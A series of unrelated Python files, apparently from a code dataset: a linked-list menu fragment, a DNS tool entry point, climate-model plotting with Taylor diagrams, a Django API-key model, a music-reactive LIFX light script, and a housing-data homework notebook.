    option=input("Enter the option: ")
    if option=='1':
        value=int(input('Enter the value: '))
        listLinked.insertEnd(value)
    elif option=='2':
        # NOTE(review): the method is spelled deleteFist (sic) on
        # DoublyLinkedList — confirm against that class before renaming.
        listLinked.deleteFist()
    elif option=='3':
        value=int(input('Enter the value: '))
        print(listLinked.getItem(value))
        input("Press the <ENTER> key to continue...")
    elif option=='4':
        listLinked.showList()
        input("Press the <ENTER> key to continue...")
# copy objects
# ex2 = copy.deepcopy(ex)
# ex2.insertEnd(4)
# ex.showList()
# ex2.showList()
986,916 | 2c818fc974b5e158299ff498d9bd783cd6867224 | # Copyright (c) Huoty, All rights reserved
# Author: Huoty <sudohuoty@163.com>
import sys
from dnspx.cli import main
if __name__ == "__main__":
    # Rewrite argv[0] so the process reports its program name as "dnspx"
    # (e.g. in usage/help output) regardless of how it was launched.
    sys.argv[0] = "dnspx"
    # Propagate main()'s return value as the process exit code.
    sys.exit(main())
|
986,917 | d9856f7143024c2ee72b463ab0e6e7b02dfb0436 | import matplotlib.pyplot as plt
import numpy as np
from score_post import time_basic_score
from taylorDiagram import plot_daylor_graph
from taylorDiagram import plot_daylor_graph_new
fontsize = 14
def plot_categories(fig0, obs, mod, j):
    """Plot obs-vs-model time series and Taylor diagrams for site *j*.

    obs / mod are 8-element lists: hourly, daily, monthly, yearly data
    arrays followed by the four matching time axes.  Data arrays are
    numpy masked arrays indexed [site, time].  Returns the figure, the
    four time-series axes and the four Taylor-diagram sample handles.
    """
    [h_obs, d_obs, m_obs, y_obs, h_t_obs, d_t_obs, m_t_obs, y_t_obs] = obs
    [h_mod, d_mod, m_mod, y_mod, h_t_mod, d_t_mod, m_t_mod, y_t_mod] = mod
    plt.rcParams.update({'font.size': 16})
    # Drop masked (missing) observations for this site; the same masks are
    # applied to the model series and time axes so everything stays aligned.
    data1 = h_obs[j, :][~h_obs[j, :].mask]
    data2 = d_obs[j, :][~d_obs[j, :].mask]
    data3 = m_obs[j, :][~m_obs[j, :].mask]
    data4 = y_obs[j, :][~y_obs[j, :].mask]
    h_t_obs, d_t_obs, m_t_obs, y_t_obs = h_t_obs[~h_obs[j, :].mask], d_t_obs[~d_obs[j, :].mask], m_t_obs[~m_obs[j, :].mask], y_t_obs[~y_obs[j, :].mask]
    models1, models2, models3, models4 = [], [], [], []
    for i in range(len(d_mod)):
        models1.append(h_mod[i][j, :][~h_obs[j, :].mask])
        models2.append(d_mod[i][j, :][~d_obs[j, :].mask])
        models3.append(m_mod[i][j, :][~m_obs[j, :].mask])
        models4.append(y_mod[i][j, :][~y_obs[j, :].mask])
    # Taylor diagrams in the right-hand column (subplots 422/424/426/428).
    fig0, sample1 = plot_daylor_graph(data1, models1, fig0, 422)
    fig0, sample2 = plot_daylor_graph(data2, models2, fig0, 424)
    fig0, sample3 = plot_daylor_graph(data3, models3, fig0, 426)
    fig0, sample4 = plot_daylor_graph(data4, models4, fig0, 428)
    # Time-series panels in the left-hand column.
    ax0 = fig0.add_subplot(4, 2, 1)
    ax1 = fig0.add_subplot(4, 2, 3)
    ax2 = fig0.add_subplot(4, 2, 5)
    ax3 = fig0.add_subplot(4, 2, 7)
    # print(type(data1))
    ax0.plot(h_t_obs, data1, 'k-', label='Observed')
    ax1.plot(d_t_obs, data2, 'k-', label='Observed')
    ax2.plot(m_t_obs, data3, 'k-', label='Observed')
    ax3.plot(y_t_obs, data4, 'k-', label='Observed')
    for i in range(len(h_mod)):
        ax0.plot(h_t_obs, models1[i], '-', label= "Model "+str(i+1))
        ax1.plot(d_t_obs, models2[i], '-', label= "Model "+str(i+1))
        ax2.plot(m_t_obs, models3[i], '-', label= "Model "+str(i+1))
        ax3.plot(y_t_obs, models4[i], '-', label= "Model "+str(i+1))
    return fig0, ax0, ax1, ax2, ax3, [sample1, sample2, sample3, sample4]
def plot_new_categories(fig0, obs, mod, j, rect1, rect2, rect3, rect4, rect, ref_times):
    """Variant of plot_categories with caller-supplied subplot layout.

    rect1..rect4 place the hourly/daily/monthly/yearly time-series axes;
    *rect* and *ref_times* are forwarded to plot_daylor_graph_new, which
    draws all four Taylor diagrams in one combined panel.
    """
    [h_obs, d_obs, m_obs, y_obs, h_t_obs, d_t_obs, m_t_obs, y_t_obs] = obs
    [h_mod, d_mod, m_mod, y_mod, h_t_mod, d_t_mod, m_t_mod, y_t_mod] = mod
    plt.rcParams.update({'font.size': 16})
    # Drop masked observations for site j; apply the same masks to the
    # model series and the time axes to keep them aligned.
    data1 = h_obs[j, :][~h_obs[j, :].mask]
    data2 = d_obs[j, :][~d_obs[j, :].mask]
    data3 = m_obs[j, :][~m_obs[j, :].mask]
    data4 = y_obs[j, :][~y_obs[j, :].mask]
    h_t_obs, d_t_obs, m_t_obs, y_t_obs = h_t_obs[~h_obs[j, :].mask], d_t_obs[~d_obs[j, :].mask], m_t_obs[~m_obs[j, :].mask], y_t_obs[~y_obs[j, :].mask]
    models1, models2, models3, models4 = [], [], [], []
    for i in range(len(d_mod)):
        models1.append(h_mod[i][j, :][~h_obs[j, :].mask])
        models2.append(d_mod[i][j, :][~d_obs[j, :].mask])
        models3.append(m_mod[i][j, :][~m_obs[j, :].mask])
        models4.append(y_mod[i][j, :][~y_obs[j, :].mask])
    # fig0, sample1 = plot_daylor_graph(data1, models1, fig0, 422)
    # fig0, sample2 = plot_daylor_graph(data2, models2, fig0, 424)
    # fig0, sample3 = plot_daylor_graph(data3, models3, fig0, 426)
    # fig0, sample4 = plot_daylor_graph(data4, models4, fig0, 428)
    fig0, samples1, samples2, samples3, samples4 = plot_daylor_graph_new(data1, data2, data3, data4, models1, models2, models3, models4, fig0, rect=rect, ref_times=ref_times)
    ax0 = fig0.add_subplot(rect1)
    ax1 = fig0.add_subplot(rect2)
    ax2 = fig0.add_subplot(rect3)
    ax3 = fig0.add_subplot(rect4)
    ax0.plot(h_t_obs, data1, 'k-', label='Observed')
    ax1.plot(d_t_obs, data2, 'k-', label='Observed')
    ax2.plot(m_t_obs, data3, 'k-', label='Observed')
    ax3.plot(y_t_obs, data4, 'k-', label='Observed')
    for i in range(len(h_mod)):
        ax0.plot(h_t_obs, models1[i], '-', label="Model " + str(i + 1))
        ax1.plot(d_t_obs, models2[i], '-', label= "Model " + str(i + 1))
        ax2.plot(m_t_obs, models3[i], '-', label= "Model " + str(i + 1))
        ax3.plot(y_t_obs, models4[i], '-', label= "Model " + str(i + 1))
    # fig0.legend(line,labels, loc='upper left')
    ax0.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    return fig0, ax0, ax1, ax2, ax3, [samples1, samples2, samples3, samples4]
class basic_post(object):
    def __init__(self, variable, site_name, filedir):
        """Store the variable name, site-name list and output directory."""
        self.variable = variable
        self.sitename = site_name
        self.filedir = filedir
    def plot_basic_time_series_for_each_site(self, hour_obs, hour_mod, day_obs, day_mod, month_obs, month_mod, year_obs, year_mod):
        """Plot per-site obs/model time series + Taylor diagrams and score them.

        Each *_obs / *_mod argument is a 3-element list [data, time_axis,
        unit].  One figure per site is written to
        <filedir>/<variable>/<site>_time_basic_<variable>.png.
        Returns an ndarray of per-site model scores.
        """
        [h_obs, h_t_obs, h_unit_obs] = hour_obs
        [h_mod, h_t_mod, h_unit_mod] = hour_mod
        [m_obs, m_t_obs, m_unit_obs] = month_obs
        [m_mod, m_t_mod, m_unit_mod] = month_mod
        [d_obs, d_t_obs, d_unit_obs] = day_obs
        [d_mod, d_t_mod, d_unit_mod] = day_mod
        [y_obs, y_t_obs, y_unit_obs] = year_obs
        [y_mod, y_t_mod, y_unit_mod] = year_mod
        scores = []
        for j, site in enumerate(self.sitename):
            # if j==2: break
            # fig0, ax0 = plt.subplots(nrows=4, ncols=2)
            fig0 = plt.figure(figsize=(14, 18))
            print('Process on time_basic_' + ''.join(site) + '_No.' + str(j) + '!')
            obs = [h_obs, d_obs, m_obs, y_obs, h_t_obs, d_t_obs, m_t_obs, y_t_obs]
            mod = [h_mod, d_mod, m_mod, y_mod, h_t_mod, d_t_mod, m_t_mod, y_t_mod]
            # fig0, ax0, ax1, ax2, ax3, samples = plot_categories(fig0, obs, mod, j)
            fig0, ax0, ax1, ax2, ax3, samples = plot_new_categories(fig0, obs, mod, j, 411, 412, 425, 427, 224, 5)
            # Score this site's models from the Taylor-diagram samples.
            model_score = time_basic_score(samples)
            scores.append(model_score)
            # plt.suptitle(self.variable + '( ' + h_unit_obs + ' )', fontsize=20)
            ax0.set_xlabel('Time',fontsize=fontsize)
            ax0.set_ylabel(self.variable + '( ' + h_unit_obs + ' )', fontsize=fontsize)
            ax1.set_xlabel('Time',fontsize=fontsize)
            ax1.set_ylabel(self.variable + '( ' + d_unit_obs + ' )', fontsize=fontsize)
            ax2.set_xlabel('Time',fontsize=fontsize)
            ax2.set_ylabel(self.variable + '( ' + m_unit_obs + ' )', fontsize=fontsize)
            ax3.set_xlabel('Time',fontsize=fontsize)
            ax3.set_ylabel(self.variable + '( ' + y_unit_obs + ' )', fontsize=fontsize)
            ax0.legend(loc='upper right', shadow=False, fontsize='medium')
            # ax1.legend(loc='upper right', shadow=False, fontsize='medium')
            # ax2.legend(loc='upper right', shadow=False, fontsize='medium')
            # ax3.legend(loc='upper right', shadow=False, fontsize='medium')
            # plt.tight_layout()
            # plt.show()
            fig0.savefig(self.filedir + self.variable + '/' + ''.join(site)+'_' + 'time_basic' +'_' + self.variable + '.png')
            plt.close('all')
            # print(model_score)
            # print(scores)
            # assert False
        scores = np.asarray(scores)
        return scores
    def plot_pdf(self, hour_obs, hour_mod, day_obs, day_mod, month_obs, month_mod, year_obs, year_mod):
        """Plot empirical CDFs (observed vs. each model) at four time resolutions, per site.

        Figures are saved under ``self.filedir``.

        NOTE(review): ``scores`` is initialised but never appended to, so this
        always returns an empty array -- confirm whether a CDF-based score was
        intended here.
        """
        [h_obs, h_t_obs, h_unit_obs] = hour_obs
        [h_mod, h_t_mod, h_unit_mod] = hour_mod
        [m_obs, m_t_obs, m_unit_obs] = month_obs
        [m_mod, m_t_mod, m_unit_mod] = month_mod
        [d_obs, d_t_obs, d_unit_obs] = day_obs
        [d_mod, d_t_mod, d_unit_mod] = day_mod
        [y_obs, y_t_obs, y_unit_obs] = year_obs
        [y_mod, y_t_mod, y_unit_mod] = year_mod
        scores = []
        for j, site in enumerate(self.sitename):
            print('Process on PDF_' + ''.join(site) + '_No.' + str(j) + '!')
            fig1 = plt.figure(figsize=(8, 15))
            # Sort each masked site series and drop masked entries for the CDF x-axis.
            h_obs_sorted = np.ma.sort(h_obs[j, :]).compressed()
            d_obs_sorted = np.ma.sort(d_obs[j, :]).compressed()
            m_obs_sorted = np.ma.sort(m_obs[j, :]).compressed()
            y_obs_sorted = np.ma.sort(y_obs[j, :]).compressed()
            # print(h_obs[j,:].shape)
            # print(h_obs_sorted)
            # Empirical cumulative probabilities in [0, 1] for each resolution.
            p1_data = 1. * np.arange(len(h_obs_sorted)) / (len(h_obs_sorted) - 1)
            p2_data = 1. * np.arange(len(d_obs_sorted)) / (len(d_obs_sorted) - 1)
            p3_data = 1. * np.arange(len(m_obs_sorted)) / (len(m_obs_sorted) - 1)
            p4_data = 1. * np.arange(len(y_obs_sorted)) / (len(y_obs_sorted) - 1)
            ax4 = fig1.add_subplot(4, 1, 1)
            ax5 = fig1.add_subplot(4, 1, 2)
            ax6 = fig1.add_subplot(4, 1, 3)
            ax7 = fig1.add_subplot(4, 1, 4)
            ax4.plot(h_obs_sorted, p1_data, label='Observed')
            ax5.plot(d_obs_sorted, p2_data, label='Observed')
            ax6.plot(m_obs_sorted, p3_data, label='Observed')
            ax7.plot(y_obs_sorted, p4_data, label='Observed')
            # Overlay each model, restricted to the timesteps where obs are valid so
            # lengths match the observed CDF axis (assumes the model series carry no
            # extra masking of their own -- TODO confirm).
            for i in range(len(d_mod)):
                ax4.plot(np.ma.sort((h_mod[i][j, :][~h_obs[j, :].mask])), p1_data, label="Model "+str(i+1))
                ax5.plot(np.ma.sort((d_mod[i][j, :][~d_obs[j, :].mask])), p2_data, label="Model "+str(i+1))
                ax6.plot(np.ma.sort((m_mod[i][j, :][~m_obs[j, :].mask])), p3_data, label="Model "+str(i+1))
                ax7.plot(np.ma.sort((y_mod[i][j, :][~y_obs[j, :].mask])), p4_data, label="Model "+str(i+1))
            # fig1, ax4, ax5, ax6, ax7 = plot_categories(fig1, obs, mod, j)
            ax4.set_ylabel('CDF',fontsize=12)
            ax4.set_xlabel(self.variable + '( ' + h_unit_obs + ' )', fontsize=12)
            ax5.set_ylabel('CDF',fontsize=12)
            ax5.set_xlabel(self.variable + '( ' + d_unit_obs + ' )', fontsize=12)
            ax6.set_ylabel('CDF',fontsize=12)
            ax6.set_xlabel(self.variable + '( ' + m_unit_obs + ' )', fontsize=12)
            ax7.set_ylabel('CDF',fontsize=12)
            ax7.set_xlabel(self.variable + '( ' + y_unit_obs + ' )', fontsize=12)
            ax4.legend(loc='upper right', shadow=False, fontsize='medium')
            # ax5.legend(loc='upper right', shadow=False, fontsize='medium')
            # ax6.legend(loc='upper right', shadow=False, fontsize='medium')
            # ax7.legend(loc='upper right', shadow=False, fontsize='medium')
            fig1.savefig(self.filedir + self.variable + '/' + ''.join(site) + '_' + 'pdf' + '_' + self.variable + '.png')
            plt.close('all')
        scores = np.asarray(scores)
        return scores
def time_analysis(variable_name, h_site_name_obs, filedir, hour_obs, hour_mod, day_obs, day_mod, month_obs, month_mod, year_obs, year_mod):
    """Run the basic time-series and CDF diagnostics for one variable.

    Builds a ``basic_post`` helper and delegates to its two plotting methods.
    Returns a ``(time_series_scores, pdf_scores)`` tuple of numpy arrays.
    """
    poster = basic_post(variable_name, h_site_name_obs, filedir)
    # Both plotting methods take the same eight data triples.
    series = (hour_obs, hour_mod, day_obs, day_mod, month_obs, month_mod, year_obs, year_mod)
    ts_scores = poster.plot_basic_time_series_for_each_site(*series)
    pdf_scores = poster.plot_pdf(*series)
    return ts_scores, pdf_scores
986,918 | 72959a838c71747f6b4bc878dda1821735b5c9c4 | from django.db import models
from datetime import datetime
from django.utils import timezone
from django.utils.html import format_html
# Create your models here.
class ApiKey(models.Model):
    """An API credential (userId/authKey pair) valid within [startTime, endTime).

    The ``formatted_*`` helpers render field values for the admin list view,
    striking through the value when the key is no longer (or not yet) valid.
    """

    url = models.TextField()
    userId = models.CharField(max_length=255)
    authKey = models.CharField(max_length=255)
    startTime = models.DateTimeField()
    endTime = models.DateTimeField()
    # Timestamp of the most recent successful use of this key; None if never used.
    lastSuccess = models.DateTimeField(null=True)

    # Display format shared by all formatted_* helpers below.
    _date_format = "%d %b %Y, %H:%M:%S"

    def is_valid(self):
        """Returns True if this key is valid (now is between the start and end times)"""
        return self.startTime <= ApiKey.get_now() < self.endTime

    def update_last_valid(self):
        """Record a successful use of this key and persist it."""
        self.lastSuccess = ApiKey.get_now()
        self.save()

    @staticmethod
    def get_now():
        """Current time, made aware in the project's active timezone."""
        return timezone.make_aware(datetime.now(), timezone.get_current_timezone())

    @staticmethod
    def get_valid():
        """Get all ApiKeys that are valid, most recently used first."""
        # Reuse the canonical "now" helper instead of duplicating its logic.
        now = ApiKey.get_now()
        keys = ApiKey.objects.all().filter(startTime__lte=now).filter(endTime__gt=now).order_by('-lastSuccess')
        return keys

    def formatted_url(self):
        if self.is_valid():
            return self.url
        else:
            return ApiKey._add_strike(self.url)
    formatted_url.short_description = "URL"

    def formatted_user_id(self):
        if self.is_valid():
            return self.userId
        else:
            return ApiKey._add_strike(self.userId)
    formatted_user_id.short_description = "User ID"

    def formatted_auth_key(self):
        if self.is_valid():
            return self.authKey
        else:
            return ApiKey._add_strike(self.authKey)
    formatted_auth_key.short_description = "Key"

    def formatted_start_time(self):
        if self.is_valid():
            return self.startTime.strftime(ApiKey._date_format)
        else:
            return ApiKey._add_strike(self.startTime.strftime(ApiKey._date_format))
    formatted_start_time.short_description = "Start Time"

    def formatted_end_time(self):
        if self.is_valid():
            return self.endTime.strftime(ApiKey._date_format)
        else:
            return ApiKey._add_strike(self.endTime.strftime(ApiKey._date_format))
    formatted_end_time.short_description = "End Time"

    def formatted_last_success(self):
        if self.is_valid():
            if self.lastSuccess is None:
                return "Never"
            else:
                return self.lastSuccess.strftime(ApiKey._date_format)
        else:
            if self.lastSuccess is None:
                return ApiKey._add_strike("Never")
            else:
                return ApiKey._add_strike(self.lastSuccess.strftime(ApiKey._date_format))
    formatted_last_success.short_description = "Last Success"

    @staticmethod
    def _add_strike(value):
        # Pass *value* as a format_html argument so it is HTML-escaped.
        # Concatenating it into the template string (as before) bypassed
        # autoescaping -- an XSS vector via e.g. a malicious url -- and would
        # also raise on any '{' or '}' in the value.
        return format_html("<span style=\"text-decoration: line-through;\">{}</span>", value)

    def __str__(self):
        return '%s:%s' % (self.userId, self.authKey)
|
986,919 | 5746804655b28aa7a49aa5c73a97d58e2736679a | import matplotlib.pyplot as pl
import socket, time, sys, traceback, math, json, random, string, numpy as np
# audiodev/audiospeex are compiled extension modules; fail fast with a hint
# when they cannot be loaded.
try:
    import audiodev, audiospeex
except:
    # NOTE(review): bare except also swallows SystemExit/KeyboardInterrupt.
    print 'cannot load audiodev.so and audiospeex.so, please set the PYTHONPATH'
    traceback.print_exc()
    sys.exit(-1)
def getTerminalSize():
    """Return the terminal size as a (columns, rows) tuple of ints.

    Tries, in order: a TIOCGWINSZ ioctl on stdin/stdout/stderr, the same
    ioctl on the controlling terminal, and finally the LINES/COLUMNS
    environment variables (defaulting to 25 rows x 80 columns).
    """
    import os
    env = os.environ

    def ioctl_GWINSZ(fd):
        # Ask the kernel for the window size of the tty on *fd*;
        # returns (rows, cols) or None when fd is not a terminal.
        try:
            import fcntl, termios, struct
            return struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,
                                                   '1234'))
        except Exception:  # narrowed from a bare except: let KeyboardInterrupt through
            return None

    cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
    if not cr:
        # None of the standard fds is a tty (e.g. all redirected);
        # fall back to the controlling terminal.
        try:
            fd = os.open(os.ctermid(), os.O_RDONLY)
            try:
                cr = ioctl_GWINSZ(fd)
            finally:
                os.close(fd)  # never leak the fd, even if the ioctl path fails
        except Exception:
            pass
    if not cr:
        # Last resort: environment (values may be strings; int() below handles both).
        cr = (env.get('LINES', 25), env.get('COLUMNS', 80))
    # cr is (rows, cols); callers expect (width, height).
    return int(cr[1]), int(cr[0])
# Connect to LIFX:
# Local bridge speaking newline-delimited JSON over TCP.
lifx = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
lifx.connect(('localhost', 8080))
def send(command):
    # Python 2: str payloads go straight onto the socket, one JSON object per line.
    lifx.send(json.dumps(command)+'\n')
# Mutable state shared with the inout() audio callback below.
last_update = 0        # last time a colour command was sent to the bulb
last_hue_change = 0    # last time the hue jumped on a detected beat
levels = [0,0,0,0]     # recent loudness samples
slow_level = 1.0       # slow-moving average of spectral energy
fast_level = 1.0       # fast-moving average of spectral energy
slow_fade = 0.985      # decay factor of the slow average
fast_fade = 0.8        # decay factor of the fast average
variance = 0.1         # running variance of (fast_level - slow_level)
hue = random.random()*360
hue_index = 1          # ANSI colour index matching the current hue
def colorwheel(hue):
    """Map a hue angle in degrees to an ANSI foreground-colour index.

    Bands: red (<30), yellow (<80), green (<150), cyan (<200),
    blue (<260), magenta (<330), and red again from 330 up.
    """
    bands = (
        (30, 1),   # red
        (80, 3),   # yellow
        (150, 2),  # green
        (200, 6),  # cyan
        (260, 4),  # blue
        (330, 5),  # magenta
    )
    for upper, code in bands:
        if hue < upper:
            return code
    return 1  # wrap around back to red
def inout(fragment, timestamp, userdata):
    """Audio callback: estimate beat energy from *fragment* and drive the lamp.

    Called by audiodev every frame with raw 16-bit PCM.  Updates the
    module-level level/variance trackers, prints an ANSI VU bar, and
    rate-limits colour commands to the LIFX bulb.  Returns silence so the
    playback side stays quiet.
    """
    global f, d, slow_level, slow_fade, fast_level, fast_fade, variance, std, n, levels, last_update, last_hue_change, hue, hue_index
    try:
        # NOTE(review): np.fromstring is deprecated; np.frombuffer is the modern spelling.
        data = np.fromstring(fragment, dtype='int16')
        f = data
        lev = np.std(data)
        d = np.fft.rfft(data)
        l = np.linalg.norm(d)  # overall spectral energy of this fragment
        # Exponential moving averages at two time constants.
        fast_level *= fast_fade
        fast_level += (1.0-fast_fade)*l
        slow_level *= slow_fade
        slow_level += (1.0-slow_fade)*l
        error2 = (fast_level - slow_level)**2
        variance *= slow_fade
        variance += (1-slow_fade)*error2
        std = math.sqrt(variance)
        # Clip to prevent instability when quiet:
        std = np.max([std,8000])
        # How far the fast average sits above baseline, in "standard deviations".
        level_offset = (fast_level-slow_level)/std
        bigness = 0.5 + 0.5*level_offset
        levels.append(bigness)
        hueChange = False
        # Beat heuristic: a >1.5-sigma spike, rising for three samples in a row,
        # at most one hue jump per 0.3 s.
        if level_offset > 1.5 and time.time() - last_hue_change > 0.3 and levels[-1] > levels[-2] and levels[-2] > levels[-3]:
            last_hue_change = time.time()
            hue += (60+120*random.random())  # jump to a visibly different hue
            hue %= 360
            hueChange = True
            hue_index = colorwheel(hue)
        (width, height) = getTerminalSize()
        width_factor = 0.1
        # Bar half-width, clamped to half the terminal width.
        o = int(np.clip(np.exp(level_offset*0.6-1.5)*width_factor,-0.5,0.5)*width)
        # NOTE(review): the string literal below presumably begins with an ESC
        # (\x1b) ANSI colour prefix that may have been mangled in transit -- confirm.
        if o < 0:
            print '[0;3'+str(hue_index)+'m' + ' '*int(width//2+o) + u'\u2588'*(-o)*2
        else:
            print '[0;3'+str(hue_index)+'m' + ' '*int(width//2-o) + u'\u2588'*o*2
        # Throttle bulb updates to roughly four per second.
        if time.time() - last_update > 0.25:
            last_update = time.time()
            avg = np.clip(np.mean(levels),0,1)
            levels = levels[-2:]
            if True:
                send({
                    'operation': 'color',
                    'value': {
                        'hue': hue,
                        'brightness': 0.05 + 0.05 * avg*0.2,
                        'saturation': 0.4,
                        'fadeTime': 0 if hueChange else 300
                    }
                })
        #print '*'*int(bigness*10)
        # Return a silent fragment of the same length for playback.
        return np.chararray.tostring(data*0)
    except KeyboardInterrupt:
        pass
    except:
        print traceback.print_exc()
    return ""
# Start full-duplex audio: 20 ms, 44.1 kHz L16 frames are delivered to inout().
audiodev.open(output="default", input="default",
    format="l16", sample_rate=44100, frame_duration=20,
    output_channels=2, input_channels=1, flags=0x01, callback=inout)
try:
    # The audio callback does all the work; just keep the main thread alive.
    while True:
        time.sleep(10)
except KeyboardInterrupt:
    audiodev.close()
#pl.plot(levels)
#pl.show()
986,920 | ff026a59f63303576c52d53e5eac041795be5e05 | #!/usr/bin/env python
# coding: utf-8
# # Homework 3 - Ames Housing Dataset
# For all parts below, answer all parts as shown in the Google document for Homework 3. Be sure to include both code that justifies your answer as well as text to answer the questions. We also ask that code be commented to make it easier to follow.
# ## Part 1 - Pairwise Correlations
# I have taken the following columns for finding the Pearson Correlation Coefficient between them. All of them are numerical columns. I have also included Sale Price in the correlation analysis as I feel that would be pretty helpful to analyse the correlation of different variables with the Sale Price and those maybe the potential candidates to include in our prediction model.
#
# 1) LotFrontage
# 2) LotArea
# 3) OverallQual
# 4) OverallCond
# 5) SalePrice
# 6) GarageArea
# 7) TotRmsAbvGrd
# 8) TotalBsmtSF
# 9) YearRemodAdd
# 10) GrLivArea
# 11) YearBuilt
# 12) BedroomAbvGr
# 13) GarageYrBlt
# 14) 2ndFlrSF
# 15) LowQualFinSF
# In[534]:
#importing all the necessary libraries
import pandas as pd
from pandas import *
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
from scipy.stats.stats import pearsonr
import itertools
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.cluster import AgglomerativeClustering
from scipy.cluster.hierarchy import dendrogram, linkage
from sklearn.cluster import KMeans
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import r2_score
get_ipython().system('pip install xgboost')
from xgboost import XGBRegressor
from sklearn.metrics import mean_squared_error
from sklearn.kernel_ridge import KernelRidge
from sklearn import linear_model
from sklearn import preprocessing
# Load the Ames training data (absolute local path -- notebook-specific).
train_houses = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/train.csv')
train_houses.head()
# In[535]:
# Pairwise Pearson correlations between the selected numeric columns.
train_houses_correlation_columns = train_houses[['LotFrontage', 'LotArea', 'OverallQual', 'OverallCond', 'GarageArea', 'TotRmsAbvGrd','TotalBsmtSF','YearRemodAdd','GrLivArea','YearBuilt','BedroomAbvGr','GarageYrBlt','2ndFlrSF','LowQualFinSF','SalePrice']]
train_houses_not_null = train_houses_correlation_columns.dropna(axis = 0, how='any')
correlations = {}
columns = ['LotFrontage', 'LotArea', 'OverallQual', 'OverallCond', 'SalePrice', 'GarageArea', 'TotRmsAbvGrd', 'TotalBsmtSF','YearRemodAdd','GrLivArea','YearBuilt','BedroomAbvGr','GarageYrBlt','2ndFlrSF','LowQualFinSF']
for col_a, col_b in itertools.combinations(columns, 2):
    # pearsonr returns a (coefficient, p-value) pair.
    correlations[col_a + '__' + col_b] = pearsonr(train_houses_not_null.loc[:, col_a], train_houses_not_null.loc[:, col_b])
correlation_result = DataFrame.from_dict(correlations, orient='index')
correlation_result.columns = ['PCC', 'p-value']
correlation_result = correlation_result[['PCC']]
correlation_result = correlation_result.sort_values(by=['PCC'], ascending=False)
with pd.option_context('display.max_rows', None, 'display.max_columns', None): print(correlation_result)
# In[540]:
# Heatmap of the full correlation matrix (A4 landscape size).
a4_dims = (11.7, 8.27)
fig, ax = plt.subplots(figsize=a4_dims)
sns.heatmap(train_houses_not_null.corr(),ax=ax)
print("Heatmap for the correlation co-efficients")
# Discuss most positive and negative correlations.
#
# Most Positive Correlations:
#
#
# 1) YearBuilt__GarageYrBlt 0.824558
#
# This correlation tells us that the earlier the house was built, the earlier they built the garage.
# Most of the houses have the garage when the house was itself built. I subtracted the year the house was built from the year the garage was built. Most of the values were 0, which means that the garage was built when the house was built.
#
# One interesting thing I found out while taking the difference of the years was that some differences were negative. This means that the garage was built earlier than the house. It may possibly be a mistake or the garage was built first and then it was extended to a house!
#
# 2) OverallQual__SalePrice 0.799069
#
# Even this should not come as a surprise as this is the expected behaviour. The better the quality of the house, the higher will be its sale price. The scatter plot for this can be seen below. One interesting thing to note here is that each overall quality has some range of Sale Price. And that range keeps on increasing as we increase the overall quality. For example, 'Overall Quality' --> 2 has a range of Sale Price somewhere between 10,000 - 90,000, 'Overall Quality' --> 3 has a range of Sale Price of 50,000 t o 1,30,000. The ranges for overall quality are overlapping, but the maximum value of 'Sale Price' for each 'Overall Quality' is increasing linearly.
# In[546]:
# Scatter plots for the two strongest positive correlations discussed above.
plt.scatter(train_houses_not_null['YearBuilt'], train_houses_not_null['GarageYrBlt'])
plt.xlabel('Year Built')
plt.ylabel('Garage Year Built')
plt.show()
plt.scatter(train_houses_not_null['OverallQual'], train_houses_not_null['SalePrice'])
plt.xlabel('House Overall Quality')
plt.ylabel('House Sale Price')
plt.show()
# Most negative correlations:
#
# 1) OverallCond__YearBuilt -0.426921
#
# This correlation tells us that the earlier the house was built, the more the overall condition deteriorated, although it's not a strong correlation. This can be explained by the fact the house was also remodelled. This is proven by the fact that 'YearRemodAdd' and 'OverallQual' of the house are correlated nicely at 0.57. The year in which the house was remodeled is given by the column 'YearRemodAdd'.
#
# 2) OverallCond__GarageYrBlt -0.343965
#
# This correlation tells us about the relation between the overall condition of the house and the year the garage was built in. The older the garage, the worse the condition of the house.
#
# The scatter plots for both of these negative correlations can be seen below.
# In[80]:
# Scatter plots for the two strongest negative correlations discussed above.
plt.scatter(train_houses_not_null['OverallCond'], train_houses_not_null['YearBuilt'])
plt.xlabel('Overall Condition of the house')
plt.ylabel('Year Built')
plt.show()
plt.scatter(train_houses_not_null['OverallCond'], train_houses_not_null['GarageYrBlt'])
plt.xlabel('Overall Condition of the house')
plt.ylabel('Garage Year Built')
plt.show()
# ## Part 2 - Informative Plots
# In[567]:
# code to generate Plot 1
# Scatter Plot of House Style v/s Year Built
plt.scatter(train_houses['HouseStyle'], train_houses['YearBuilt'])
plt.xlabel('House Style')
plt.ylabel('Year Built')
plt.show()
# What interesting properties does Plot 1 reveal?
#
# The most interesting properties that the Plot 1 reveal are the ranges of years for which a particular house style was in fashion in Ames, Iowa.
#
# The most popular version of the house people preferred in Ames was 2Story building.
#
# For example, the construction for 2Story house style began way back in 1800s and it was built evenly till late 2000s .
#
# There were a few instances of 1Story buildings in 1880's and then the construction of 1Story buildings stopped until 1910s
# and then again it was built regularly.
#
# The rarest house styles are 1.5Unf, 2.5Unf and 2.5Fin. They were present only on an on-off basis.
#
# It would be pretty interesting to know the reasons behind why such patterns are observed. Why the construction of a particular house style was relevant only for a particular period of time. It may reveal some very interesting back-stories.
#
# In[582]:
# code to generate Plot 2
# Scatter plot of Garage Quality vs Sale Price
# Rows with missing GarageQual/SalePrice are dropped first.
garagequal_saleprice_notnull = train_houses[['GarageQual', 'SalePrice']].dropna(axis=0, how='any')
plt.scatter(garagequal_saleprice_notnull['GarageQual'], garagequal_saleprice_notnull['SalePrice'], color='maroon')
plt.xlabel('Garage Quality')
plt.ylabel('Sale Price')
plt.show()
# What interesting properties does Plot 2 reveal?
#
# TA - Typical
# Fa - Fair
# Gd - Good
# Ex - Excellent
# Po - Poor
# Plot 2 reveals that SalePrice is dependent on Garage Quality but not too much. We can conclude this by seeing that Poor garage quality houses have SalePrice mostly on the lower side of the spectrum. Fair, which is a grade higher than Poor, has slight higher values of SalePrice. Good garage quality has slightly higher range of values than Fair.
#
